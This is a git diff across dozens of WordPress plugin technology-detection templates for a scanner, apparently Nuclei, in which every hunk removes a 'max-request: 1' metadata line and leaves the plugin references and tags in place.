diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
-    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
-    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
-    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
-    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
-    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 6bd95ec077..9555d7aebd 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
-    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 1fd64a5279..180266f448 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
-    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 1bb9a283ce..17584cd064 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
-    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
-    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
-    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
-    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
-    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
-    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
-    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
-    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
-    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
-    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
-    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
-    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
-    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
-    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
-    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
-    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 87721a245a..d4ac0d179e 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
-    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 45e0dead0e..dbbadf3cfc 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
-    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
-    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
-    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
-    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
-    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
-    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
-    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
-    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
-    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
-    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
-    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index aa1898c4ba..48ffb25245 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
-    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
-    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
